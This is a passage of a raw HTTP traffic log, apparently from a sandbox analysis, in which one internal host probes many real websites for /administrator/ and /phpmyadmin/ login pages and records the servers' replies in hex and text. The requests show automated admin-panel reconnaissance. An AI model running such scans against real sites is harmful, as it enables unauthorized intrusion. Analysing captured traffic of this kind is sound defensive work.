Feb 21, 2024 00:26:09.467734098 CET	370	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://cabinet-orsika.fr/administrator/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Feb 21, 2024 00:26:12.305692911 CET	190	OUT	GET /administrator/index.php HTTP/1.1 Host: cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.465214968 CET	379	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://cabinet-orsika.fr/administrator/index.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.6	56550	144.91.85.110	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.311211109 CET	174	OUT	GET /administrator/ HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.492207050 CET	536	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://m-viper.de/administrator/ X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: master-only Referrer-Policy: same-origin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Feb 21, 2024 00:26:10.714471102 CET	227	OUT	GET /administrator/index.php HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://m-viper.de/administrator/
Feb 21, 2024 00:26:10.894839048 CET	545	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://m-viper.de/administrator/index.php X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: master-only Referrer-Policy: same-origin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.6	56566	217.160.0.179	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.321065903 CET	173	OUT	GET /administrator/ HTTP/1.1 Host: upblue.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.839685917 CET	569	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 36 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 91 4f 4f 84 30 10 c5 ef 26 7e 87 b1 89 47 18 c8 7a 30 4a 39 b8 7f a2 c9 aa 1b c3 46 3d 76 a1 2b 8d 40 b1 2d b2 eb a7 97 76 4b 5c 0f 26 72 69 3b 79 33 f3 de 8f e4 6c f6 38 cd 5e 57 73 28 4d 5d c1 6a 7d b3 bc 9b 02 09 10 9f 27 53 c4 59 36 83 97 db ec 7e 09 71 18 c1 42 b1 9a 6b 6e 10 e7 0f 04 48 69 4c 7b 85 d8 f7 7d d8 4f 42 a9 de 30 7b c2 9d 9d 13 db 46 7f 0d b6 be 2b 2c 4c 41 d2 d3 93 c4 2a dc c9 59 61 4f 23 4c c5 d3 ae 85 4d d5 f1 04 0f cf a1 5e 73 c3 a0 19 56 52 f2 ce f7 bd 54 85 26 90 cb c6 f0 c6 50 42 00 6d f3 91 a8 e0 3a 57 a2 35 42 36 7f e8 ac e3 80 7f 74 e2 93 12 3f 28 30 fb 96 1f c9 0d df 19 b4 0e af 21 2f 99 1a d2 d2 75 b6 08 2e fd 3a 2c bd e9 31 15 28 d9 6b 4a e2 28 3a 77 e1 5c 1d b4 ca a9 e3 a3 07 40 5d 6b 83 85 17 95 a8 59 58 70 44 56 d4 a2 11 da 28 66 a4 42 02 2e 31 25 9e 00 01 37 63 33 e4 e5 8a 92 88 40 23 15 d7 e2 6b e0 30 de 88 cb de c8 83 0b cb 61 23 8b bd 83 1a ff 90 2c 63 5b 69 d3 84 41 a9 f8 f6 ff 8e 52 ff 6b bd f3 c1 f3 6f cb 09 b2 14 ec 97 60 6b 57 e0 b8 1d 8f 2d e1 c8 c8 49 2c d3 f4 1b 78 32 a9 34 6f 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 168OO0&~Gz0J9F=v+@-vK\&ri;y3l8^Ws(M]j}'SY6~qBknHiL{}OB0{F+,LA*YaO#LM^sVRT&PBm:W5B6t?(0!/u.:,1(kJ(:w\@]kYXpDV(fB.1%7c3@#k0a#,c[iARko`kW-I,x24o0
Feb 21, 2024 00:26:10.839988947 CET	224	OUT	GET /administrator/index.php HTTP/1.1 Host: upblue.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://upblue.de/administrator/
Feb 21, 2024 00:26:18.708895922 CET	575	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:18 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 36 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9d 91 3f 4f c3 30 10 c5 77 24 be c3 61 89 31 b9 44 65 40 90 64 a0 7f 04 52 81 0a a5 02 46 37 be 12 8b 24 36 8e 4b 5a 3e 3d b1 9b 8a 2e 5d c8 62 fb f4 ee ee bd 5f 92 8b c9 f3 38 7f 5f 4c a1 b4 75 05 8b e5 dd fc 61 0c 2c 40 7c 1d 8d 11 27 f9 04 de ee f3 c7 39 c4 61 04 33 c3 6b 6a c9 22 4e 9f 18 b0 d2 5a 7d 83 d8 75 5d d8 8d 42 65 3e 30 7f c1 ad 9b 13 bb c6 e1 1a ac 87 ae 50 58 c1 b2 f3 b3 c4 29 fc 49 5c b8 d3 4a 5b 51 b6 d1 b0 aa 36 94 e0 fe d9 d7 6b b2 1c 9a 7e 65 ca 3e 69 d7 29 23 5a 06 85 6a 2c 35 36 65 0c d0 35 1f 89 04 b5 85 91 da 4a d5 9c d0 39 c7 01 7d 6d e4 77 ca 86 41 81 dd 69 3a 92 5b da 5a 74 0e 6f a1 28 b9 e9 d3 a6 cb 7c 16 5c 0f eb b0 1c 4c 1f 52 81 51 5d 9b b2 38 8a 2e 7d 38 5f 87 d6 14 a9 e7 d3 f6 80 36 da 05 0b af 2a 59 f3 50 10 22 17 b5 6c 64 6b 0d b7 ca a0 6c 04 6d 43 5d 6a 06 3e 7a ca 06 14 0c fc b0 55 1f 9c 4c ca 22 06 8d 32 d4 ca 9f 1e c8 e1 c6 3c 84 46 ed ed 38 20 2b 25 76 9e 6e fc 87 b4 8c 5d 45 67 09 87 d2 d0 fa 1f d6 b2 e1 67 0f 59 fa 14 27 42 24 c8 33 70 5f 82 da 2d c5 83 1f 3c 36 89 07 7c 5e e2 70 67 bf af 69 37 56 8a 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 16e?O0w$a1De@dRF7$6KZ>=.]b_8_Lua,@\|'9a3kj"NZ}u]Be>0PX)I\J[Q6k~e>i)#Zj,56e5J9}mwAi:[Zto(\|\LRQ]8.}8_6*YP"ldklmC]j>zUL"2<F8 +%vn]EggY'B$3p_-<6\|^pgi7V0

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.6	56623	213.186.33.4	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.321068048 CET	176	OUT	GET /phpmyadmin/ HTTP/1.1 Host: art-paix-di.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.483971119 CET	433	IN	HTTP/1.1 404 Not Found date: Tue, 20 Feb 2024 23:26:09 GMT content-type: text/html; charset=iso-8859-1 content-length: 196 server: Apache x-iplb-request-id: BF60E3DE:DD2F_D5BA2104:0050_65D53511_286FC:41AB x-iplb-instance: 51919 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.6	56582	217.26.61.200	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.324384928 CET	173	OUT	GET /administrator/ HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.526554108 CET	437	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:09 GMT Server: Apache Location: https://eskimo.ch/administrator/ Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 73 6b 69 6d 6f 2e 63 68 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://eskimo.ch/administrator/">here</a>.</p></body></html>
Feb 21, 2024 00:26:11.907620907 CET	277	OUT	GET /administrator/index.php HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip Cookie: PHPSESSID=i3lvqgq0ufurmkbj7l8g7oodcfvqs85s User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://eskimo.ch/administrator/
Feb 21, 2024 00:26:12.090596914 CET	455	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache Location: https://eskimo.ch/administrator/index.php Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 73 6b 69 6d 6f 2e 63 68 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://eskimo.ch/administrator/index.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.6	56682	86.105.245.69	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.341232061 CET	180	OUT	GET /administrator/ HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.509073019 CET	395	IN	HTTP/1.1 301 Moved Permanently Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Content-Length: 175 Connection: keep-alive Location: https://stylesense.co.uk/administrator/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.1</center></body></html>
Feb 21, 2024 00:26:12.305370092 CET	189	OUT	GET /administrator/index.php HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.471265078 CET	404	IN	HTTP/1.1 301 Moved Permanently Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Content-Length: 175 Connection: keep-alive Location: https://stylesense.co.uk/administrator/index.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.6	56679	213.186.33.5	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.343159914 CET	179	OUT	GET /administrator/ HTTP/1.1 Host: pharmacie-vp.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.524051905 CET	458	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Tue, 20 Feb 2024 23:26:09 GMT content-type: text/html content-length: 138 location: http://imp.ovh.net x-iplb-request-id: BF60E3DE:DD67_D5BA2105:0050_65D53511_8654009:3720 x-iplb-instance: 52243 set-cookie: SERVERID77446=200177\|ZdU1F\|ZdU1F; path=/; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>
Feb 21, 2024 00:26:12.148195028 CET	230	OUT	GET /administrator/index.php HTTP/1.1 Host: pharmacie-vp.fr Accept: / Accept-Encoding: deflate, gzip Cookie: SERVERID77446=200177\|ZdU1F\|ZdU1F User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.312448025 CET	394	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Tue, 20 Feb 2024 23:26:12 GMT content-type: text/html content-length: 138 location: http://imp.ovh.net x-iplb-request-id: BF60E3DE:DD67_D5BA2105:0050_65D53514_8654731:3720 x-iplb-instance: 52243 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.6	56674	185.107.56.198	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.350482941 CET	174	OUT	GET /administrator/ HTTP/1.1 Host: att.com.ph Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.026566029 CET	927	IN	HTTP/1.1 200 OK accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile cache-control: max-age=0, private, must-revalidate connection: close content-length: 485 content-type: text/html; charset=utf-8 date: Tue, 20 Feb 2024 23:26:09 GMT server: nginx set-cookie: sid=6d8cb5bc-d047-11ee-bf1a-b2ef032372ed; path=/; domain=.att.com.ph; expires=Mon, 10 Mar 2092 02:40:16 GMT; max-age=2147483647; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 61 74 74 2e 63 6f 6d 2e 70 68 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 77 4f 44 51 33 4f 44 63 32 4f 53 77 69 61 57 46 30 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 59 35 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 58 46 79 59 6d 78 77 59 32 6f 35 5a 57 4d 34 61 32 39 71 64 6d 63 7a 63 58 56 74 4d 47 45 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 44 67 30 4e 7a 45 31 4e 6a 6b 73 49 6e 52 7a 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 59 35 4e 44 49 33 4e 7a 63 33 66 51 2e 5a 38 6c 62 43 56 72 66 5a 79 7a 67 69 66 47 6d 31 77 76 61 46 4f 2d 37 75 6a 36 53 67 49 6a 34 30 45 7a 31 47 4c 72 4d 4e 55 41 26 73 69 64 3d 36 64 38 63 62 35 62 63 2d 64 30 34 37 2d 31 31 65 65 2d 62 66 31 61 2d 62 32 65 66 30 33 32 33 37 32 65 64 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://att.com.ph/administrator/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcwODQ3ODc2OSwiaWF0IjoxNzA4NDcxNTY5LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydXFyYmxwY2o5ZWM4a29qdmczcXVtMGEiLCJuYmYiOjE3MDg0NzE1NjksInRzIjoxNzA4NDcxNTY5NDI3Nzc3fQ.Z8lbCVrfZyzgifGm1wvaFO-7uj6SgIj40Ez1GLrMNUA&sid=6d8cb5bc-d047-11ee-bf1a-b2ef032372ed');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.6	56681	78.47.2.70	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.354181051 CET	186	OUT	GET /administrator/ HTTP/1.1 Host: breecetechnology.co.za Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.537260056 CET	413	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:09 GMT Server: Apache Content-Length: 268 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 